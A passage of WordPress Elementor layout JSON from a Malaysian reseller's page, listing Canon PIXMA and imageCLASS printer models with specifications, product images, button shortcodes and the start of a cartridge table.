]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" 